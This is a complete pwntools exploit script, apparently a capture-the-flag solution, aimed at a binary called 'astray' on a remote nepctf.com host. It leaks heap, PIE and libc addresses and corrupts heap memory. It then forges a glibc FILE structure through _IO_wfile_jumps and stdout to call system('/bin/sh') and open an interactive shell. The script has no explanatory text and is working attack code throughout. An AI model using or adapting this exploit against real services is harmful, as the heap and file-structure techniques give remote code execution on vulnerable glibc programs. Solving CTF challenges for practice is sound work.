1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128
| from pwn import *
context(arch="amd64", os="linux") context.log_level='debug' context.terminal = ["tmux", "splitw", "-h", "-l", "190"]
libc_base=0x0 heap_base=0x0 pie=0x0
def getshell() : return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))
r = lambda a : p.recv(a) rl = lambda a=False : p.recvline(a) ru = lambda a : p.recvuntil(a) s = lambda x : p.send(x) sl = lambda x : p.sendline(x) sa = lambda a,b : p.sendafter(a,b) sla = lambda a,b : p.sendlineafter(a,b) shell = lambda : p.interactive() li = lambda offset :libc_base+offset lis= lambda func :libc_base+libc.symbols[func] pi = lambda offset :pie+offset he = lambda offset :heap_base+offset l32 = lambda :u32(p.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00')) l64 = lambda :u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) uu32 = lambda :u32(p.recv(4).ljust(4,b'\x00')) uu64 = lambda :u64(p.recv(6).ljust(8,b'\x00')) ggg = lambda :(gdb.attach(p),pause())
def manwrite(index,concent): sla(b'(1:manager 1000:user)\n',b'1') sa(b'visit user(MANAGER_visit)\n',b'MANAGER_write') sla(b'1-19: manager can visit\n',str(index).encode()) pause() s(concent)
def manread(index): sla(b'(1:manager 1000:user)\n',b'1') sa(b'visit user(MANAGER_visit)\n',b'MANAGER_read') sla(b'1-19: manager can visit\n',str(index).encode())
def visitr(index): sla(b'(1:manager 1000:user)\n',b'1') sa(b'visit user(MANAGER_visit)\n',b'MANAGER_visit') sla(b'1-19: manager can visit\n',str(index).encode()) sla(b'2: manager visit user to write to user_logs\n',b'1')
def visitw(index,content): sla(b'(1:manager 1000:user)\n',b'1') sa(b'visit user(MANAGER_visit)\n',b'MANAGER_visit') sla(b'1-19: manager can visit\n',str(index).encode()) sla(b'2: manager visit user to write to user_logs\n',b'2') pause() s(content)
def userr(index): sla(b'(1:manager 1000:user)\n',b'1000') sa(b'user write to logs(USER_write)\n',b'USER_read') sla(b'10-19: user can visit\n',str(index).encode())
def userw(index,content): sla(b'(1:manager 1000:user)\n',b'1000') sa(b'user write to logs(USER_write)\n',b'USER_write') sla(b'10-19: user can visit\n',str(index).encode()) pause() s(content)
def attack(index): sla(b'(1:manager 1000:user)\n',b'1000') sa(b'user write to logs(USER_write)\n',b'MANAGER_visit') sla(b'10-19: user can visit\n',str(index).encode())
libc=ELF('./libc.so.6') elf=ELF('./astray')
p = remote("nepctf32-unsz-rtgi-s43y-ymc9bujpw004.nepctf.com", 443, ssl=True) manread(0) r(8) heap_base=uu64()-0x22d0 r(2) pie=uu64()-0x41a0 print(hex(heap_base)) print(hex(pie)) manwrite(2,p64(he(0x4a0+8))+p64(pie+0x4040)) attack(0) visitw(1,p64(1)+p64(he(0x22d0))+p64(he(0x4a0-0x8))) visitr(3) libc_base=uu64()-0x21b6a0 print(hex(libc_base))
ogg1=li(0xebc81) ogg2=li(0xebc85) ogg3=li(0xebc88) ogg4=li(0xebce2) ogg5=li(0xebd38) ogg6=li(0xebd3f) ogg7=li(0xebd43) stdout=lis("_IO_2_1_stdout_") IO_wfile_jumps=libc_base+libc.sym['_IO_wfile_jumps'] setcontext_61=libc_base+libc.sym['setcontext']+61 system,binsh=getshell()
payload=flat( { 0x20:p64(1), 0x18:p64(0), 0xe0:p64(he(0x9a0+0x50)), (0x50+0x18):p64(system), },filler=b'\x00' ) manwrite(7,payload)
visitw(1,p64(li(0x21b6a0))+p64(0)*3+p64(stdout)+p64(3)) pay=flat( { 0x0:[b'/bin/sh\x00'], 0x20:[p64(0)], 0x28:[p64(1)], 0xc0:[p64(0)], 0xd8:[p64(IO_wfile_jumps+0x10)], 0x88:[p64(he(0x600)+0x90)], 0xa0:[p64(he(0x9a0))] },filler=b'\x00') userw(0,pay) shell()
|